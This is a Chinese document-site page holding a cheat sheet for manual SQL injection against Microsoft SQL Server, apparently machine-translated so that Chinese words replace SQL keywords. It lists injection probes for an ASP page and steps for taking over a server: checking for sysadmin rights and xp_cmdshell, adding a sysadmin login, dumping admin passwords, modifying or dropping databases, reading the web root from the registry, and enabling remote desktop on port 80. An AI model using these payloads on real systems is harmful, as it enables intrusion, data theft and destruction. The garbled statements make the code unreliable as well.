手工mssql注入(Manual MSSQL injection).docVIP

  1. 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
  2. 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载
  3. 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
  4. 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
  5. 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们
  6. 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
  7. 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
手工mssql注入(Manual MSSQL injection)

手工mssql注入(Manual MSSQL injection) 存在(SELECT * FROM sysobjects)/判断是否是MSSQL 存在(SELECT * FROM tablename)/判断某表是否存在TableName为表名.. 1 =(版本)/ MSSQL版本 1 =(选择db_name())/当前数据库名 1 =(选择@ @ ServerName)/本地服务名 1 =(选择is_srvrolemember(sysadmin ))/判断是否是系统管理员 1 =(选择is_member(db_owner ))/判断是否是库权限 1 =(选择has_dbaccess(“主人”))/判断是否有库读取权限 1 =(选择的名字,从master.dbo.sysdatabases DBID = 1)/暴库名DBID为1,2,3的… ;声明int /是否支持多行D 1 =(select count(*)从哪里master.dbo.sysobjects xtype =“X”和名称=“xp_cmdshell )/判断xp_cmdshell是否存在 1 =(select count(*)从master.dbo.sysobjects name =“xp_regread )/查看xp_regread扩展存储过程是不是已经被删除 添加和删除一个SA权限的用户测试:(需要SA权限) 执行master.dbo.sp_addlogin测试,密码 执行master.dbo.sp_addsrvrolemember测试,系统管理员 停掉或激活某个服务(需要SA权限)。 执行主.. xp_servicecontrol 停止,schedule” 执行主.. xp_servicecontrol 开始,schedule” 暴网站目录 创建表labeng(拉拉nvarchar(255),ID int) 声明@结果varchar(255)执行master.dbo.xp_regread”hkey_local_machine,controlset001 \服务\系统\ W3SVC \参数\虚拟根目录”、“/”、“结果输出插入labeng(拉拉)值(@结果); 1 =(从labeng选择前1或者拉拉)1 =(select count(*)从哪里labeng拉拉 1) -----------------------------------------------------分割 3389并修改端口号DOS下开 SC配置来说开始=汽车 启动来说 / /允许外连 注册地址“hkey_local_machine \系统\ CurrentControlSet \控制\终端服务器”/ V fdenytsconnections / T reg_dword / D / F 0 该端口到80 / 3389 注册地址“hkey_local_machine \系统\ CurrentControlSet \控制\终端服务器winstations \ RDP TCP端口号/ V / T reg_dword / 80 / f SQL Server 判断是否可注射: /article.asp?ID = 6 /article.asp?id = 6 /article.asp?id = 6和1 = 1 /article.asp?id = 6和1 = 2 /article.asp?动作=值和1 = 1 /article.asp?动作=值和1 = 2 searchpoints %和1 = 1 searchpoints %和1 = 2 确定数据库类型: /article.asp?id = 6和用户 0 /article.asp?ID = 6(select count(*)从sysobjects) 0 查询当前用户数据信息: article.asp?id = 6,具有1=1 暴当前表中的列: article.asp?ID = 6组有1 = 1 admin.username -- article.asp?ID = 6组管理员用户名,admin.password 1 = 1 暴任意表和列: 和(选择前1名(选择前N个ID,名字中,X型= char(85))T订单ID号) 1 和(选择上col_name(object_id(admin ),n)从sysobjects) 1 暴数据库数据: 和(从管理员id是N)选择前1名的密码 1 修改数据库中的数据: ;更新管理设置密码=“oooooo在用户名= xxx” Add data to the database: Insert, into, admin, values (XXX, oooooo) - Delete database: Drop, database,

您可能关注的文档

文档评论(0)

f8r9t5c + 关注
实名认证
文档贡献者

该用户很懒,什么也没介绍

版权声明书
用户编号:8000054077000003

1亿VIP精品文档

相关文档